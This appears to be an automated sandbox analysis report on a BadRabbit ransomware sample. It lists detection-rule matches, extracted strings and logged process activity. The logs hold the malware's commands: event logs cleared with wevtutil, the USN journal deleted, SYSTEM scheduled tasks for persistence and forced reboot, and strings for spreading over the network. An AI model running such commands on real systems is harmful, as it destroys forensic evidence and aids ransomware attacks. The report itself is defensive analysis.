        Source: 0.2.download.exe.c00000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 11.0.2594.tmp.7ff73cfc0000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.3.rundll32.exe.2cb4d60.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 11.2.2594.tmp.7ff73cfc0000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule - file 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.2.rundll32.exe.2cb4d60.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 2.3.rundll32.exe.2cb4d60.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 2.3.rundll32.exe.2cb4d60.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 23.2.dispci.exe.df0000.0.unpack, type: UNPACKEDPEMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
        Source: 23.2.dispci.exe.df0000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 23.0.dispci.exe.df0000.0.unpack, type: UNPACKEDPEMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
        Source: 23.0.dispci.exe.df0000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.3.rundll32.exe.2cb4d60.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 2.3.rundll32.exe.2cb4d60.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 2.3.rundll32.exe.2cb4d60.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 2.2.rundll32.exe.2cb4d60.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: 0.2.download.exe.10ce578.1.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.2.rundll32.exe.2c371b8.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.2.rundll32.exe.2c371b8.1.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.2.rundll32.exe.2c371b8.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit author = kevoreilly, description = BadRabbit Payload, cape_type = BadRabbit Payload
        Source: 2.2.rundll32.exe.4850000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.2.rundll32.exe.4850000.2.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.2.rundll32.exe.4850000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit author = kevoreilly, description = BadRabbit Payload, cape_type = BadRabbit Payload
        Source: 2.2.rundll32.exe.2c371b8.1.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.2.rundll32.exe.2c371b8.1.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 2.2.rundll32.exe.2c371b8.1.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit author = kevoreilly, description = BadRabbit Payload, cape_type = BadRabbit Payload
        Source: 00000002.00000003.1717628248.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
        Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
        Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: C:\Windows\cscc.dat, type: DROPPEDMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
        Source: cscc.dat.2.drBinary string: configFlags\Device\dcrypt\DosDevices\dcryptdump_hiber_%s\$dcsys$$dcsys$\Device\CdRom%s\$DC_TRIM_%x$$dcsys$_fail_%xNTFSFATFAT32exFATRSDS
        Source: rundll32.exe, 00000002.00000002.1754801710.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted*..Readme.txt%s-h-f%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhost0.0.0.0\rundll32.exe%ws C:\Windows\%ws,#1 %wsSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilege%08X%08X/c %ws%wswevtutil cl %ws & SetupSystemSecurityApplicationfsutil usn deletejournal /D %c:schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00schtasks /Delete /F /TN drogon255.255.255.255%u.%u.%u.%uC:\Windows\System32\rundll32.exe "C:\Windows\",#2 \\%s\admin$\\%ws\admin$\%wsprocess call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "wbem\wmic.exe%ws WaitForMultipleObjectskernel32
        Source: rundll32.exe, 00000002.00000003.1717628248.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, dispci.exe, 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmp, dispci.exe, 00000017.00000000.1746531825.0000000000E03000.00000002.00000001.01000000.00000007.sdmp, dispci.exe.2.drBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted%lS OK
        Source: classification engineClassification label: mal100.rans.spre.troj.spyw.evad.winEXE@58/8@2/4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04857CC5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,SetLastError,2_2_04857CC5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,2_2_04859534
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_04851368
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_048584EE CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,2_2_048584EE
        Source: C:\Windows\dispci.exeCode function: 23_2_00DF5150 CoInitialize,CoCreateInstance,GetModuleFileNameW,GetVersion,ExpandEnvironmentStringsW,Sleep,CoUninitialize,23_2_00DF5150
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04858313 FindResourceW,LoadResource,LockResource,SizeofResource,GetProcessHeap,GetProcessHeap,HeapAlloc,RtlAllocateHeap,memcpy,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,RtlFreeHeap,2_2_04858313
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04859534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,2_2_04859534
        Source: C:\Windows\dispci.exeFile created: C:\Users\Public\Desktop\DECRYPT.lnkJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8180:120:WilError_03
        Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\82517A223AD6FDE5
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8040:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7600:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8092:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7984:120:WilError_03
        Source: download.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\download.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\download.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
        Source: download.exeReversingLabs: Detection: 97%
        Source: download.exeVirustotal: Detection: 88%
        Source: C:\Users\user\Desktop\download.exeFile read: C:\Users\user\Desktop\download.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\download.exe "C:\Users\user\Desktop\download.exe"
        Source: C:\Users\user\Desktop\download.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\download.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:43:00
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\2594.tmp "C:\Windows\2594.tmp" \\.\pipe\{D8F326F0-A034-43D5-AD41-3DA9EEB64FB1}
        Source: C:\Windows\2594.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:43:00
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 3065482610 && exit
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\dispci.exe "C:\Windows\dispci.exe" -id 3065482610
        Source: C:\Windows\dispci.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\dispci.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN drogon
        Source: unknownProcess created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x4 /state0:0xa3f61055 /state1:0x41c64e6d
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: unknownProcess created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x2 /state0:0xa3f6c855 /state1:0x41c64e6d
        Source: unknownProcess created: C:\Windows\System32\fontdrvhost.exe "fontdrvhost.exe"
        Source: unknownProcess created: C:\Windows\System32\fontdrvhost.exe "fontdrvhost.exe"
        Source: unknownProcess created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x2 /state0:0xa3f74055 /state1:0x41c64e6d
        Source: unknownProcess created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x2 /state0:0xa3f04055 /state1:0x41c64e6d
        Source: unknownProcess created: C:\Windows\System32\fontdrvhost.exe "fontdrvhost.exe"
        Source: C:\Users\user\Desktop\download.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegalJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit"Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:43:00Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\2594.tmp "C:\Windows\2594.tmp" \\.\pipe\{D8F326F0-A034-43D5-AD41-3DA9EEB64FB1}Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN drogonJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegalJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 3065482610 && exit"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 17:43:00Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl SetupJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl SystemJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl SecurityJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl ApplicationJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\dispci.exe "C:\Windows\dispci.exe" -id 3065482610 Jump to behavior
        Source: C:\Windows\dispci.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegalJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegalJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogonJump to behavior
